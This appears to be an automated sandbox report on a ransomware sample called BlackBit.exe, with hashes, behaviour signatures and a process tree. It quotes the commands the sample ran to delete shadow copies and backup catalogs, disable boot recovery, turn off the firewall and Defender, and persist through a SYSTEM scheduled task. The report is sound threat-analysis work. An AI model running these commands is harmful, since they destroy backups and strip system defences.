Analysis
-
max time kernel
207s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
10/06/2023, 16:43
Static task
static1
Behavioral task
behavioral1
Sample
BlackBit.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
BlackBit.exe
Resource
win10v2004-20230220-en
General
-
Target
BlackBit.exe
-
Size
499KB
-
MD5
7ef84720d7b30286bff9483fe53bba62
-
SHA1
b8dbb845cc37fa555d5a3f52e4bbb76aa2be0933
-
SHA256
9763da5ee688a2391599a22638a84cbc7f99e32cd6865eac4621cc427f6c3a63
-
SHA512
3dde93035b9824256613ba4d93cafa9f43c037953d26ca9390bbda8feca477c0fe149bee4730362cee3b0b2d89ca825bba7243d43665adc8c5272863a33f718e
-
SSDEEP
12288:Dh1Lk70Tnvjcg27dWy1fX6qOLzvkLek4v+KXdPeA:fk70TrcbT56qOHv31PJv
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection BlackBit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" BlackBit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" BlackBit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" BlackBit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" BlackBit.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 1856 netsh.exe 1728 netsh.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe BlackBit.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe BlackBit.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat BlackBit.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\winlogon.exe BlackBit.exe File opened for modification C:\Windows\winlogon.exe BlackBit.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1592 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1232 vssadmin.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell\open BlackBit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell\open\command\ = "C:\\ProgramData\\n2m2luwa.exe \"%l\" " BlackBit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.BlackBit BlackBit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.BlackBit\ = "BlackBit" BlackBit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell\open\command BlackBit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit BlackBit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell BlackBit.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2000 BlackBit.exe 2000 BlackBit.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 2000 BlackBit.exe Token: SeIncreaseQuotaPrivilege 1620 WMIC.exe Token: SeSecurityPrivilege 1620 WMIC.exe Token: SeTakeOwnershipPrivilege 1620 WMIC.exe Token: SeLoadDriverPrivilege 1620 WMIC.exe Token: SeSystemProfilePrivilege 1620 WMIC.exe Token: SeSystemtimePrivilege 1620 WMIC.exe Token: SeProfSingleProcessPrivilege 1620 WMIC.exe Token: SeIncBasePriorityPrivilege 1620 WMIC.exe Token: SeCreatePagefilePrivilege 1620 WMIC.exe Token: SeBackupPrivilege 1620 WMIC.exe Token: SeRestorePrivilege 1620 WMIC.exe Token: SeShutdownPrivilege 1620 WMIC.exe Token: SeDebugPrivilege 1620 WMIC.exe Token: SeSystemEnvironmentPrivilege 1620 WMIC.exe Token: SeRemoteShutdownPrivilege 1620 WMIC.exe Token: SeUndockPrivilege 1620 WMIC.exe Token: SeManageVolumePrivilege 1620 WMIC.exe Token: 33 1620 WMIC.exe Token: 34 1620 WMIC.exe Token: 35 1620 WMIC.exe Token: SeBackupPrivilege 828 vssvc.exe Token: SeRestorePrivilege 828 vssvc.exe Token: SeAuditPrivilege 828 vssvc.exe Token: SeIncreaseQuotaPrivilege 1620 WMIC.exe Token: SeSecurityPrivilege 1620 WMIC.exe Token: SeTakeOwnershipPrivilege 1620 WMIC.exe Token: SeLoadDriverPrivilege 1620 WMIC.exe Token: SeSystemProfilePrivilege 1620 WMIC.exe Token: SeSystemtimePrivilege 1620 WMIC.exe Token: SeProfSingleProcessPrivilege 1620 WMIC.exe Token: SeIncBasePriorityPrivilege 1620 WMIC.exe Token: SeCreatePagefilePrivilege 1620 WMIC.exe Token: SeBackupPrivilege 1620 WMIC.exe Token: SeRestorePrivilege 1620 WMIC.exe Token: SeShutdownPrivilege 1620 WMIC.exe Token: SeDebugPrivilege 1620 WMIC.exe Token: SeSystemEnvironmentPrivilege 1620 WMIC.exe Token: SeRemoteShutdownPrivilege 1620 WMIC.exe Token: SeUndockPrivilege 1620 WMIC.exe Token: SeManageVolumePrivilege 1620 WMIC.exe Token: 33 1620 WMIC.exe Token: 34 1620 WMIC.exe Token: 35 1620 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2000 wrote to memory of 1736 2000 BlackBit.exe 28 PID 2000 wrote to memory of 1736 2000 BlackBit.exe 28 PID 2000 wrote to memory of 1736 2000 BlackBit.exe 28 PID 2000 wrote to memory of 1736 2000 BlackBit.exe 28 PID 1736 wrote to memory of 1592 1736 cmd.exe 30 PID 1736 wrote to memory of 1592 1736 cmd.exe 30 PID 1736 wrote to memory of 1592 1736 cmd.exe 30 PID 1736 wrote to memory of 1592 1736 cmd.exe 30 PID 2000 wrote to memory of 1992 2000 BlackBit.exe 31 PID 2000 wrote to memory of 1992 2000 BlackBit.exe 31 PID 2000 wrote to memory of 1992 2000 BlackBit.exe 31 PID 2000 wrote to memory of 1992 2000 BlackBit.exe 31 PID 1992 wrote to memory of 1164 1992 csc.exe 33 PID 1992 wrote to memory of 1164 1992 csc.exe 33 PID 1992 wrote to memory of 1164 1992 csc.exe 33 PID 1992 wrote to memory of 1164 1992 csc.exe 33 PID 2000 wrote to memory of 2020 2000 BlackBit.exe 34 PID 2000 wrote to memory of 2020 2000 BlackBit.exe 34 PID 2000 wrote to memory of 2020 2000 BlackBit.exe 34 PID 2000 wrote to memory of 2020 2000 BlackBit.exe 34 PID 2000 wrote to memory of 1040 2000 BlackBit.exe 35 PID 2000 wrote to memory of 1040 2000 BlackBit.exe 35 PID 2000 wrote to memory of 1040 2000 BlackBit.exe 35 PID 2000 wrote to memory of 1040 2000 BlackBit.exe 35 PID 2000 wrote to memory of 1760 2000 BlackBit.exe 38 PID 2000 wrote to memory of 1760 2000 BlackBit.exe 38 PID 2000 wrote to memory of 1760 2000 BlackBit.exe 38 PID 2000 wrote to memory of 1760 2000 BlackBit.exe 38 PID 2000 wrote to memory of 1532 2000 BlackBit.exe 39 PID 2000 wrote to memory of 1532 2000 BlackBit.exe 39 PID 2000 wrote to memory of 1532 2000 BlackBit.exe 39 PID 2000 wrote to memory of 1532 2000 BlackBit.exe 39 PID 2000 wrote to memory of 636 2000 BlackBit.exe 42 PID 2000 wrote to memory of 636 2000 BlackBit.exe 42 PID 2000 wrote to memory of 636 2000 BlackBit.exe 42 PID 2000 wrote to memory of 636 2000 BlackBit.exe 42 PID 2000 wrote to memory of 856 2000 BlackBit.exe 49 PID 2000 wrote to memory of 856 2000 BlackBit.exe 49 PID 2000 wrote to memory of 856 2000 BlackBit.exe 49 PID 2000 wrote to memory of 856 2000 BlackBit.exe 49 PID 2000 wrote to memory of 1772 2000 BlackBit.exe 44 PID 2000 wrote to memory of 1772 2000 BlackBit.exe 44 PID 2000 wrote to memory of 1772 2000 BlackBit.exe 44 PID 2000 wrote to memory of 1772 2000 BlackBit.exe 44 PID 2020 wrote to memory of 1232 2020 cmd.exe 46 PID 2020 wrote to memory of 1232 2020 cmd.exe 46 PID 2020 wrote to memory of 1232 2020 cmd.exe 46 PID 2020 wrote to memory of 1232 2020 cmd.exe 46 PID 1760 wrote to memory of 1620 1760 cmd.exe 50 PID 1760 wrote to memory of 1620 1760 cmd.exe 50 PID 1760 wrote to memory of 1620 1760 cmd.exe 50 PID 1760 wrote to memory of 1620 1760 cmd.exe 50 PID 2000 wrote to memory of 872 2000 BlackBit.exe 47 PID 2000 wrote to memory of 872 2000 BlackBit.exe 47 PID 2000 wrote to memory of 872 2000 BlackBit.exe 47 PID 2000 wrote to memory of 872 2000 BlackBit.exe 47 PID 1772 wrote to memory of 1856 1772 cmd.exe 52 PID 1772 wrote to memory of 1856 1772 cmd.exe 52 PID 1772 wrote to memory of 1856 1772 cmd.exe 52 PID 1772 wrote to memory of 1856 1772 cmd.exe 52 PID 872 wrote to memory of 1728 872 cmd.exe 53 PID 872 wrote to memory of 1728 872 cmd.exe 53 PID 872 wrote to memory of 1728 872 cmd.exe 53 PID 872 wrote to memory of 1728 872 cmd.exe 53 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BlackBit.exe"C:\Users\Admin\AppData\Local\Temp\BlackBit.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN BlackBit /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN BlackBit /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:1592
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rs4a2t13\rs4a2t13.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES536E.tmp" "c:\ProgramData\CSC352E94E7E50442B5962F1A7C2F2BD21.TMP"3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1232
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:1532
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵PID:636
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off2⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
PID:1856
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵PID:856
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:828
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
MD56aad6c003cf15ec5c54a44bddc28db3b
SHA1d54048eed832182d038fe8632f171eca8749b7ee
SHA256eaea0759a7b943a011aad783df6d534ccc8cbcf92569aae19748a3ff371c477f
SHA512fce08c03ebcef3d59262bdda3e726612e3c89f0d3af1766045dc908696afe89d82d2840753d7db6e397dd3763901bea33ecd85e68f2064cb072b1e6c5e9f9253
-
Filesize
499KB
MD57ef84720d7b30286bff9483fe53bba62
SHA1b8dbb845cc37fa555d5a3f52e4bbb76aa2be0933
SHA2569763da5ee688a2391599a22638a84cbc7f99e32cd6865eac4621cc427f6c3a63
SHA5123dde93035b9824256613ba4d93cafa9f43c037953d26ca9390bbda8feca477c0fe149bee4730362cee3b0b2d89ca825bba7243d43665adc8c5272863a33f718e
-
Filesize
105KB
MD54d33cdd0e302133ff98fdab6d8f6407e
SHA124662ca733af7562cb29a76196c3e80f7e703ea7
SHA2563d66a454ee42f1489908f5cdc042786c5533136133e8803f8a442e8309e8ff75
SHA512dcb44963dad715717ed776ed02f689215f43618db46faed9b4a5b0d96381edf1cc1d5c2df10f507dfa0cbcb5af320225cb78fb2da6907742762ffd621ccd401b
-
Filesize
103KB
MD5e60417cf16af88f18c2aa37c148c519f
SHA1ec4e402124009bc6439cce1fcba15771ba79afe5
SHA256d603bd10222c5a64a727f97c52f210fc242112080193d1894f92cf163b3c7ccf
SHA512c2a9ac466aadb865831146e2c0f1756929505ead55ec4350c0f00d1c4402f02cce41140da9d672748cbbb36eb87c0e8fb14b8d8b37760d798bf70ef37648afb3
-
Filesize
1KB
MD599629ddb21e98a50dd5243a184d3639b
SHA1f3b24cf085b18d4673415968f49a48125156b8fe
SHA2566d0d3df5ae257a29f15b38d28677a7d552d6af3d6318fab86d2e885ab9c5e6f6
SHA51202ef972fb5d9d06e5cd2bc94949dc0229de28d9f64aa0489a2c24cc3ed4a5f814f5e0705376a929aa7d07f9f41d0d6e1291264ead792080f1cbdc0fef8b47182
-
Filesize
236B
MD5d09f8bbbf31f93ea2dd793cd62111f9c
SHA10da4b384ec4b19cabb0b64308a07a0184e09c217
SHA256c0d57336530c5e61bf31c0a7b9e51ba12162042675afc4514524a54e558be083
SHA512fa80417c6680199c09cfff517737afd985db947269ff4981d61f13d03b5dc36844beb73cd5caa2bd63a57924a9f0f46ff4058e339dd48ed8a82102dddcffd159
-
Filesize
102KB
MD5305c2042777e67710483e58acc04ac2c
SHA1d68e4090e313e6b814ca795980c2bc054df78a77
SHA256f9ddf619ca0266055744c2beca77673aa41702104b459a0f55de3945196b6c50
SHA5120e55fe1cacda339cbe207d51f7d3be2e008fc3013520ce863967443332d6647c80d48959a84c5885f53c9b6cf66046e4b9065c840b35d1975bbec63b7fc24203